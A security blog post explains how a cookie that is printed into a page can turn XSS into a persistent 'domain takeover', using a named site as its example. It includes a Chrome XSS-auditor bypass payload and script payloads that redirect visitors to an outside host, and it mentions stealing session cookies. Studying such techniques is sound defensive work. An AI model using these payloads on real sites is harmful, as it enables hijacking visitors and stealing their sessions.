TLDR
(with thanks to CapnWarhol for the summary)
- If you can execute XSS code on a site, you can set cookies
- If you can set cookies, there may be one which outputs in-page on every request
- If you save script in that cookie, you can send <script>window.location.href=“http://my-website.com/”</script> with every infected request, and functionally “take over” the domain.
Who doesn’t love XSS? Simple to find, simple to execute, and sometimes simple to bypass XSS auditors.
For bypassing Chrome auditor, if the XSS is printed directly in a <script> tag then it’ll bypass the XSS auditor. Example: index.php?value=123
Prints into HTML: <script>var value=‘123’;</script> - so if we use index.php?value=k’-alert(0)-‘k, then our xss will execute bypassing all auditors.
Firefox is simple.. no XSS protection. Safari (for mobile users) is typically the same as Chrome and blocks most stuff, and IE? Well who uses IE.
C‘mon, show me the XSS domain takeover
Ok so onward to how XSS can take over domains! First, we must find a vulnerable cookie that is printed into the DOM of the HTML, and for this example we’re going to use InstaShag.com.
In the screenshot below, we can see if the cookie “site” is set to XSS, it’ll be printed into the DOM of the HTML. This is our vulnerable cookie.
Notice how it also sets the cookie value back to the XSS? So this is persisent. Brilliant. Now we need XSS to set this cookie.
5 mins later…
That was easy! Now let’s create a script to set the cookie. (With thanks to google because i’m lazy to code JS).
So this will remove the cookie, and re-set it to our XSS. Now let’s visit Instashag.com and see what happens…
So simple XSS just injected xss to the cookie, and now anytime someone visits my site, then visits instashag.com, will have the XSS executed.
Note: They only have to visit my site ONCE to have the XSS injected to the cookie. From then on anytime they visit Instashag, XSS will execute (if you set the cookie length to expire in like a year or w/e).
So how did you take over the domain?
Set the XSS to <script>top.location.href=‘http://www.yoursite.com/’;</script> and they’ll be instantly redirected. :)
So is this bad?
Well of course. Many companies who run bug bounties tend to pay low amounts because it’s “nothing special”. XSS exists on so many sites. Imagine if your bank had XSS on it (aswell as a vuln cookie), and you was just browsing the internet minding your own business. Behind the scenes, XSS could of executed without you knowing. Now when you try visit your bank, you could be redirected to a malicious site. Bad huh? But of course, they could of also stole your cookie sessions etc etc.